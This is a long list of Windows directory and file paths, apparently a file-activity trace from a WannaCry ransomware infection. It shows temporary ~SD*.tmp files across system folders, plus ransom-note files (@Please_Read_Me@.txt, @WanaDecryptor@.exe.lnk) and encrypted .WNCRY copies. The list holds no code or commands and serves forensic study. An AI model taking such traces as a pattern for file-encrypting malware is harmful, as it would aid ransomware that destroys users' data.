C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoHotkey
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\AutoHotkey\~SDA3FD.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Boxstarter\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Boxstarter
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Boxstarter\~SDA3FE.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\~SDA40F.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Java\~SDA420.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\~SDA421.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2016 Tools\~SDA422.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\PowerShell\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\PowerShell
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\PowerShell\~SDA432.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 3.8\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 3.8
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Python 3.8\~SDA433.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\~SDA434.tmp
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\WinRAR\*
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\WinRAR
C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\WinRAR\~SDA445.tmp
C:\Users\All Users\Microsoft\Windows\Templates\*
C:\Users\All Users\Microsoft\Windows\Templates
C:\Users\All Users\Microsoft\Windows\Templates\~SDA456.tmp
C:\Users\All Users\Microsoft\Windows\WER\*
C:\Users\All Users\Microsoft\Windows\WER
C:\Users\All Users\Microsoft\Windows\WER\~SDA4A5.tmp
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\*
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive
C:\Users\All Users\Microsoft\Windows\WER\ReportArchive\~SDA4F4.tmp
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\*
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue
C:\Users\All Users\Microsoft\Windows\WER\ReportQueue\~SDA543.tmp
C:\Users\All Users\Microsoft\Windows Defender\*
C:\Users\All Users\Microsoft\Windows Defender
C:\Users\All Users\Microsoft\Windows Defender\~SDA563.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\*
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\~SDA583.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Backup\*
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Backup
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Backup\~SDA584.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Updates\*
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Updates
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\Updates\~SDA585.tmp
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{8AF8DC04-1885-4F22-8F09-BD1E568EBC7A}\*
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{8AF8DC04-1885-4F22-8F09-BD1E568EBC7A}
C:\Users\All Users\Microsoft\Windows Defender\Definition Updates\{8AF8DC04-1885-4F22-8F09-BD1E568EBC7A}\~SDA586.tmp
C:\Users\All Users\Microsoft\Windows Defender\LocalCopy\*
C:\Users\All Users\Microsoft\Windows Defender\LocalCopy
C:\Users\All Users\Microsoft\Windows Defender\LocalCopy\~SDA587.tmp
C:\Users\All Users\Microsoft\Windows Defender\Quarantine\*
C:\Users\All Users\Microsoft\Windows Defender\Quarantine
C:\Users\All Users\Microsoft\Windows Defender\Quarantine\~SDA588.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\*
C:\Users\All Users\Microsoft\Windows Defender\Scans
C:\Users\All Users\Microsoft\Windows Defender\Scans\~SDA5B8.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\Windows Defender\Scans\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\*
C:\Users\All Users\Microsoft\Windows Defender\Scans\History
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\~SDA694.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\*
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\CacheManager\~SDA6F3.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\*
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\~SDA742.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\Resource\*
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\Resource
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Results\Resource\~SDA791.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\*
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Service\~SDA7D1.tmp
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Store\*
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Store
C:\Users\All Users\Microsoft\Windows Defender\Scans\History\Store\~SDA7D2.tmp
C:\Users\All Users\Microsoft\Windows Defender\Support\*
C:\Users\All Users\Microsoft\Windows Defender\Support
C:\Users\All Users\Microsoft\Windows Defender\Support\~SDA7E2.tmp
C:\Users\All Users\Microsoft\Windows NT\*
C:\Users\All Users\Microsoft\Windows NT
C:\Users\All Users\Microsoft\Windows NT\~SDA7E3.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\*
C:\Users\All Users\Microsoft\Windows NT\MSFax
C:\Users\All Users\Microsoft\Windows NT\MSFax\~SDA7E4.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\ActivityLog\*
C:\Users\All Users\Microsoft\Windows NT\MSFax\ActivityLog
C:\Users\All Users\Microsoft\Windows NT\MSFax\ActivityLog\~SDA7E5.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\*
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\~SDA7E6.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\*
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US
C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\~SDA7E7.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Inbox\*
C:\Users\All Users\Microsoft\Windows NT\MSFax\Inbox
C:\Users\All Users\Microsoft\Windows NT\MSFax\Inbox\~SDA7F8.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\Queue\*
C:\Users\All Users\Microsoft\Windows NT\MSFax\Queue
C:\Users\All Users\Microsoft\Windows NT\MSFax\Queue\~SDA7F9.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\SentItems\*
C:\Users\All Users\Microsoft\Windows NT\MSFax\SentItems
C:\Users\All Users\Microsoft\Windows NT\MSFax\SentItems\~SDA7FA.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\*
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\~SDA7FB.tmp
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\*
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\~SDA7FC.tmp
C:\Users\All Users\Microsoft\Windows NT\MSScan\*
C:\Users\All Users\Microsoft\Windows NT\MSScan
C:\Users\All Users\Microsoft\Windows NT\MSScan\~SDA7FD.tmp
C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY
C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg
C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT
C:\Users\All Users\Microsoft\Windows NT\MSScan\@Please_Read_Me@.txt
C:\Users\All Users\Microsoft\Windows NT\MSScan\@WanaDecryptor@.exe.lnk
C:\Users\All Users\Microsoft\WwanSvc\*
C:\Users\All Users\Microsoft\WwanSvc
C:\Users\All Users\Microsoft\WwanSvc\~SDA83C.tmp
C:\Users\All Users\Microsoft\WwanSvc\Profiles\*
C:\Users\All Users\Microsoft\WwanSvc\Profiles
C:\Users\All Users\Microsoft\WwanSvc\Profiles\~SDA83D.tmp
C:\Users\All Users\Microsoft OneDrive\*
C:\Users\All Users\Microsoft OneDrive
C:\Users\All Users\Microsoft OneDrive\~SDA83E.tmp
C:\Users\All Users\Microsoft OneDrive\setup\*
C:\Users\All Users\Microsoft OneDrive\setup
C:\Users\All Users\Microsoft OneDrive\setup\~SDA83F.tmp
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\*
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\~SDA8CD.tmp
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\*
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\~SDA8FD.tmp
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\*
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB
C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\~SDA95C.tmp
C:\Users\All Users\Oracle\*
C:\Users\All Users\Oracle
C:\Users\All Users\Oracle\~SDA9AB.tmp
C:\Users\All Users\Oracle\Java\*
C:\Users\All Users\Oracle\Java
C:\Users\All Users\Oracle\Java\~SDA9FA.tmp
C:\Users\All Users\Oracle\Java\installcache\*
C:\Users\All Users\Oracle\Java\installcache
C:\Users\All Users\Oracle\Java\installcache\~SDAA2A.tmp
C:\Users\All Users\Oracle\Java\installcache_x64\*
C:\Users\All Users\Oracle\Java\installcache_x64
C:\Users\All Users\Oracle\Java\installcache_x64\~SDAA88.tmp
C:\Users\All Users\Package Cache\*
C:\Users\All Users\Package Cache
C:\Users\All Users\Package Cache\~SDAC7D.tmp
C:\Users\All Users\Package Cache\{0627E042-BBD1-4FE2-AAEF-C54BA4A69326}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{0627E042-BBD1-4FE2-AAEF-C54BA4A69326}v3.8.10150.0
C:\Users\All Users\Package Cache\{0627E042-BBD1-4FE2-AAEF-C54BA4A69326}v3.8.10150.0\~SDAD1B.tmp
C:\Users\All Users\Package Cache\{08c3379c-d122-42a4-917e-b3dc470fbcb3}\*
C:\Users\All Users\Package Cache\{08c3379c-d122-42a4-917e-b3dc470fbcb3}
C:\Users\All Users\Package Cache\{08c3379c-d122-42a4-917e-b3dc470fbcb3}\~SDAD1C.tmp
C:\Users\All Users\Package Cache\{21F60B75-2A5E-4064-A38A-D59A347B4433}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{21F60B75-2A5E-4064-A38A-D59A347B4433}v3.8.10150.0
C:\Users\All Users\Package Cache\{21F60B75-2A5E-4064-A38A-D59A347B4433}v3.8.10150.0\~SDAD1D.tmp
C:\Users\All Users\Package Cache\{2dd73f73-784c-4c71-9495-fd11cd6eddf6}\*
C:\Users\All Users\Package Cache\{2dd73f73-784c-4c71-9495-fd11cd6eddf6}
C:\Users\All Users\Package Cache\{2dd73f73-784c-4c71-9495-fd11cd6eddf6}\~SDAD1E.tmp
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\*
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\~SDAD3E.tmp
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\*
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\~SDAD8D.tmp
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\vcRuntimeMinimum_amd64\*
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\vcRuntimeMinimum_amd64
C:\Users\All Users\Package Cache\{3407B900-37F5-4CC2-B612-5CD5D580A163}v14.32.31332\packages\vcRuntimeMinimum_amd64\~SDADEC.tmp
C:\Users\All Users\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\*
C:\Users\All Users\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}
C:\Users\All Users\Package Cache\{3746f21b-c990-4045-bb33-1cf98cff7a68}\~SDAE99.tmp
C:\Users\All Users\Package Cache\{4196628C-AE5C-4304-B166-B7C1E93CDC25}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{4196628C-AE5C-4304-B166-B7C1E93CDC25}v3.8.10150.0
C:\Users\All Users\Package Cache\{4196628C-AE5C-4304-B166-B7C1E93CDC25}v3.8.10150.0\~SDAF07.tmp
C:\Users\All Users\Package Cache\{4AF94EBC-F592-4502-B0EA-07764E7F820B}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{4AF94EBC-F592-4502-B0EA-07764E7F820B}v3.8.10150.0
C:\Users\All Users\Package Cache\{4AF94EBC-F592-4502-B0EA-07764E7F820B}v3.8.10150.0\~SDAF47.tmp
C:\Users\All Users\Package Cache\{4CA4F71B-58C3-42ED-83FA-AD7AC9E9C0CB}v48.47.50420\*
C:\Users\All Users\Package Cache\{4CA4F71B-58C3-42ED-83FA-AD7AC9E9C0CB}v48.47.50420
C:\Users\All Users\Package Cache\{4CA4F71B-58C3-42ED-83FA-AD7AC9E9C0CB}v48.47.50420\~SDAF96.tmp
C:\Users\All Users\Package Cache\{54DE7EA9-E391-4BD2-A373-3A72A18EBDB5}v40.68.31213\*
C:\Users\All Users\Package Cache\{54DE7EA9-E391-4BD2-A373-3A72A18EBDB5}v40.68.31213
C:\Users\All Users\Package Cache\{54DE7EA9-E391-4BD2-A373-3A72A18EBDB5}v40.68.31213\~SDAFE5.tmp
C:\Users\All Users\Package Cache\{59650A2A-3839-46EC-9D9C-6B3B1C743C55}v40.68.31213\*
C:\Users\All Users\Package Cache\{59650A2A-3839-46EC-9D9C-6B3B1C743C55}v40.68.31213
C:\Users\All Users\Package Cache\{59650A2A-3839-46EC-9D9C-6B3B1C743C55}v40.68.31213\~SDB024.tmp
C:\Users\All Users\Package Cache\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}v40.68.31213\*
C:\Users\All Users\Package Cache\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}v40.68.31213
C:\Users\All Users\Package Cache\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}v40.68.31213\~SDB054.tmp
C:\Users\All Users\Package Cache\{5E63E49B-C88C-46C5-855C-A7B07C11CDC8}v48.47.50420\*
C:\Users\All Users\Package Cache\{5E63E49B-C88C-46C5-855C-A7B07C11CDC8}v48.47.50420
C:\Users\All Users\Package Cache\{5E63E49B-C88C-46C5-855C-A7B07C11CDC8}v48.47.50420\~SDB074.tmp
C:\Users\All Users\Package Cache\{81CDF5BF-4777-4CF8-B6CC-0902061F7314}v3.8.7427.0\*
C:\Users\All Users\Package Cache\{81CDF5BF-4777-4CF8-B6CC-0902061F7314}v3.8.7427.0
C:\Users\All Users\Package Cache\{81CDF5BF-4777-4CF8-B6CC-0902061F7314}v3.8.7427.0\~SDB0C4.tmp
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\*
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\~SDB113.tmp
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\*
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\~SDB162.tmp
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\vcRuntimeAdditional_x86\*
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\vcRuntimeAdditional_x86
C:\Users\All Users\Package Cache\{8972AC25-452E-4FFE-945A-EB9E28C20322}v14.32.31332\packages\vcRuntimeAdditional_x86\~SDB1A1.tmp
C:\Users\All Users\Package Cache\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}v40.68.31213\*
C:\Users\All Users\Package Cache\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}v40.68.31213
C:\Users\All Users\Package Cache\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}v40.68.31213\~SDB200.tmp
C:\Users\All Users\Package Cache\{94EE74AD-4205-4038-8748-000D966FA407}v48.47.50420\*
C:\Users\All Users\Package Cache\{94EE74AD-4205-4038-8748-000D966FA407}v48.47.50420
C:\Users\All Users\Package Cache\{94EE74AD-4205-4038-8748-000D966FA407}v48.47.50420\~SDB24F.tmp
C:\Users\All Users\Package Cache\{a699b48e-5748-4980-ad92-0b61b1d9d718}\*
C:\Users\All Users\Package Cache\{a699b48e-5748-4980-ad92-0b61b1d9d718}
C:\Users\All Users\Package Cache\{a699b48e-5748-4980-ad92-0b61b1d9d718}\~SDB26F.tmp
C:\Users\All Users\Package Cache\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}\*
C:\Users\All Users\Package Cache\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}
C:\Users\All Users\Package Cache\{a98dc6ff-d360-4878-9f0a-915eba86eaf3}\~SDB2FD.tmp
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\*
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\~SDB32D.tmp
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\*
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\~SDB34D.tmp
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\vcRuntimeMinimum_x86\*
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\vcRuntimeMinimum_x86
C:\Users\All Users\Package Cache\{AEAA18F7-9C96-4A43-BC07-8B88A4913EEB}v14.32.31332\packages\vcRuntimeMinimum_x86\~SDB36D.tmp
C:\Users\All Users\Package Cache\{AF01038B-6523-4EA7-9D9E-4F1E2927D88B}v40.68.31213\*
C:\Users\All Users\Package Cache\{AF01038B-6523-4EA7-9D9E-4F1E2927D88B}v40.68.31213
C:\Users\All Users\Package Cache\{AF01038B-6523-4EA7-9D9E-4F1E2927D88B}v40.68.31213\~SDB3CC.tmp
C:\Users\All Users\Package Cache\{B87AB233-E9C5-4459-8E4A-952EACECCFC4}v48.47.50420\*
C:\Users\All Users\Package Cache\{B87AB233-E9C5-4459-8E4A-952EACECCFC4}v48.47.50420
C:\Users\All Users\Package Cache\{B87AB233-E9C5-4459-8E4A-952EACECCFC4}v48.47.50420\~SDB40C.tmp
C:\Users\All Users\Package Cache\{B92B890A-04F2-4880-BA20-20D4364FB263}v48.47.50420\*
C:\Users\All Users\Package Cache\{B92B890A-04F2-4880-BA20-20D4364FB263}v48.47.50420
C:\Users\All Users\Package Cache\{B92B890A-04F2-4880-BA20-20D4364FB263}v48.47.50420\~SDB42C.tmp
C:\Users\All Users\Package Cache\{C3DD1448-513A-4DB8-978D-6991562EA63D}v48.47.50420\*
C:\Users\All Users\Package Cache\{C3DD1448-513A-4DB8-978D-6991562EA63D}v48.47.50420
C:\Users\All Users\Package Cache\{C3DD1448-513A-4DB8-978D-6991562EA63D}v48.47.50420\~SDB46B.tmp
C:\Users\All Users\Package Cache\{CD1C027B-BC87-4C8E-993D-1779A12BF141}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{CD1C027B-BC87-4C8E-993D-1779A12BF141}v3.8.10150.0
C:\Users\All Users\Package Cache\{CD1C027B-BC87-4C8E-993D-1779A12BF141}v3.8.10150.0\~SDB4AB.tmp
C:\Users\All Users\Package Cache\{D9D74D16-6E0C-417B-AA63-557EEED5AED1}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{D9D74D16-6E0C-417B-AA63-557EEED5AED1}v3.8.10150.0
C:\Users\All Users\Package Cache\{D9D74D16-6E0C-417B-AA63-557EEED5AED1}v3.8.10150.0\~SDB4CB.tmp
C:\Users\All Users\Package Cache\{DF5D4A27-B019-41FB-ACA8-62EE9947F452}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{DF5D4A27-B019-41FB-ACA8-62EE9947F452}v3.8.10150.0
C:\Users\All Users\Package Cache\{DF5D4A27-B019-41FB-ACA8-62EE9947F452}v3.8.10150.0\~SDB50B.tmp
C:\Users\All Users\Package Cache\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}v40.68.31213\*
C:\Users\All Users\Package Cache\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}v40.68.31213
C:\Users\All Users\Package Cache\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}v40.68.31213\~SDB53B.tmp
C:\Users\All Users\Package Cache\{E8900394-218B-459F-98DC-75B0FD88CC80}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{E8900394-218B-459F-98DC-75B0FD88CC80}v3.8.10150.0
C:\Users\All Users\Package Cache\{E8900394-218B-459F-98DC-75B0FD88CC80}v3.8.10150.0\~SDB58A.tmp
C:\Users\All Users\Package Cache\{EFDAD3B5-AE93-48A4-BE3E-40EEFC4F100A}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{EFDAD3B5-AE93-48A4-BE3E-40EEFC4F100A}v3.8.10150.0
C:\Users\All Users\Package Cache\{EFDAD3B5-AE93-48A4-BE3E-40EEFC4F100A}v3.8.10150.0\~SDB5BA.tmp
C:\Users\All Users\Package Cache\{efe3bb1e-6444-4bc0-9edd-7e5bae77965b}\*
C:\Users\All Users\Package Cache\{efe3bb1e-6444-4bc0-9edd-7e5bae77965b}
C:\Users\All Users\Package Cache\{efe3bb1e-6444-4bc0-9edd-7e5bae77965b}\~SDB5DA.tmp
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\*
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\~SDB639.tmp
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\*
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\~SDB659.tmp
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\vcRuntimeAdditional_amd64\*
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\vcRuntimeAdditional_amd64
C:\Users\All Users\Package Cache\{F4499EE3-A166-496C-81BB-51D1BCDC70A9}v14.32.31332\packages\vcRuntimeAdditional_amd64\~SDB689.tmp
C:\Users\All Users\Package Cache\{F51469FB-F088-479B-BD5A-70A9C557FE6F}v3.8.10150.0\*
C:\Users\All Users\Package Cache\{F51469FB-F088-479B-BD5A-70A9C557FE6F}v3.8.10150.0
C:\Users\All Users\Package Cache\{F51469FB-F088-479B-BD5A-70A9C557FE6F}v3.8.10150.0\~SDB6C8.tmp
C:\Users\All Users\regid.1991-06.com.microsoft\*
C:\Users\All Users\regid.1991-06.com.microsoft
C:\Users\All Users\regid.1991-06.com.microsoft\~SDB727.tmp
C:\Users\All Users\shimgen\*
C:\Users\All Users\shimgen
C:\Users\All Users\shimgen\~SDB795.tmp
C:\Users\All Users\shimgen\generatedfiles\*
C:\Users\All Users\shimgen\generatedfiles
C:\Users\All Users\shimgen\generatedfiles\~SDB7D5.tmp
C:\Users\All Users\Start Menu\*
C:\Users\All Users\Templates\*
C:\Users\Default\*
C:\Users\Default
C:\Users\Default\~SDB7F5.tmp
C:\Users\Default\AppData\*
C:\Users\Default\AppData
C:\Users\Default\AppData\~SDB825.tmp
C:\Users\Default\AppData\Local\*
C:\Users\Default\AppData\Local
C:\Users\Default\AppData\Local\~SDB836.tmp
C:\Users\Default\AppData\Local\Application Data\*
C:\Users\Default\AppData\Local\History\*
C:\Users\Default\AppData\Local\Microsoft\*
C:\Users\Default\AppData\Local\Microsoft
C:\Users\Default\AppData\Local\Microsoft\~SDB865.tmp
C:\Users\Default\AppData\Local\Microsoft\Windows\*
C:\Users\Default\AppData\Local\Microsoft\Windows
C:\Users\Default\AppData\Local\Microsoft\Windows\~SDB8A5.tmp
C:\Users\Default\AppData\Local\Microsoft\Windows\GameExplorer\*
C:\Users\Default\AppData\Local\Microsoft\Windows\GameExplorer
C:\Users\Default\AppData\Local\Microsoft\Windows\GameExplorer\~SDB8E4.tmp
C:\Users\Default\AppData\Local\Microsoft\Windows\History\*
C:\Users\Default\AppData\Local\Microsoft\Windows\History
C:\Users\Default\AppData\Local\Microsoft\Windows\History\~SDB905.tmp
C:\Users\Default\AppData\Roaming\*
C:\Users\Default\AppData\Roaming
C:\Users\Default\AppData\Roaming\~SDB915.tmp
C:\Users\Default\AppData\Roaming\Media Center Programs\*
C:\Users\Default\AppData\Roaming\Media Center Programs
C:\Users\Default\AppData\Roaming\Media Center Programs\~SDB955.tmp
C:\Users\Default\AppData\Roaming\Microsoft\*
C:\Users\Default\AppData\Roaming\Microsoft
C:\Users\Default\AppData\Roaming\Microsoft\~SDB985.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\*
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\~SDB9A5.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\*
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\~SDB9D5.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows
C:\Users\Default\AppData\Roaming\Microsoft\Windows\~SDBA14.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\~SDBA35.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\~SDBA64.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\~SDBA94.tmp
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\*
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent
